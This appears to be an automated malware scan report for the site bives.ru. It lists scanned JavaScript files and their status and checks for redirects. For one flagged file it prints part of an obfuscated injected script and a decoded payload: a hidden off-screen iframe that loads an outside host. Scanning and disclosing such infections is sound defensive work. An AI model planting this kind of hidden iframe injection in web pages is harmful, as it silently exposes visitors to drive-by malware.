Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bives.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.bives.ru/ | 200 OK Content-Length: 32209 Content-Type: text/html | clean |
http://www.bives.ru//ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js/ | 500 Internal Server Error Content-Length: 590 Content-Type: text/html | clean |
http://www.bives.ru/test404page.js | 404 Not Found Content-Length: 277 Content-Type: text/html | clean |
http://www.bives.ru/plugins/system/jqueryintegrator/jqueryintegrator/jquery.noconflict.js | 200 OK Content-Length: 2092 Content-Type: application/javascript | clean |
http://www.bives.ru/media/system/js/core.js | 200 OK Content-Length: 6297 Content-Type: application/javascript | clean |
http://www.bives.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 90612 Content-Type: application/javascript | clean |
http://www.bives.ru/media/system/js/caption.js | 200 OK Content-Length: 2872 Content-Type: application/javascript | clean |
http://www.bives.ru/modules/mod_zstagcloud/js/swfobject.js | 200 OK Content-Length: 11831 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var sendinde = 0; if ((sendinde = haystack.indexOf(needle, f_offset)) !== -1) { return sendinde; } return false; } function get_user_agent(){ var check_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fr Decoded script: function E() { if (e) { return; } if (h.ie && h.win) { var v = a("span"); try { var u = K.getElementsByTagName("body")[0].appendChild(v); u.parentNode.removeChild(u); } catch (w) { return; } } e = true; if (Z) { clearInterval(Z); Z = null; } var q = o.length; for (var r = 0; r < q; r++) { o[r](); } } <iframe name="Urbanistic" src="http://lacoste.desgraciadas.com.ar/kytsoykgjtjrj19.html" style="position:absolute;left:-1280px;top:-1280px;" height="133" width="133"></iframe> Antivirus reports:
| ||
http://www.bives.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 240200 Content-Type: application/javascript | clean |
http://www.bives.ru/modules/mod_djimageslider/assets/slider.js | 200 OK Content-Length: 13617 Content-Type: application/javascript | clean |
http://www.bives.ru/modules/mod_djmenu/assets/js/dropline-helper.js | 200 OK Content-Length: 2578 Content-Type: application/javascript | clean |
http://www.bives.ru/modules/mod_djmenu/assets/js/djmenu.js | 200 OK Content-Length: 8888 Content-Type: application/javascript | clean |
http://www.bives.ru/templates/dj-travel/lib/js/set_height.js | 200 OK Content-Length: 2703 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bives.ru
Result:
GET / HTTP/1.1
Host: bives.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bives.ru
Referer: http://www.google.com/search?q=bives.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bives.ru
Referer: http://www.google.com/search?q=bives.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.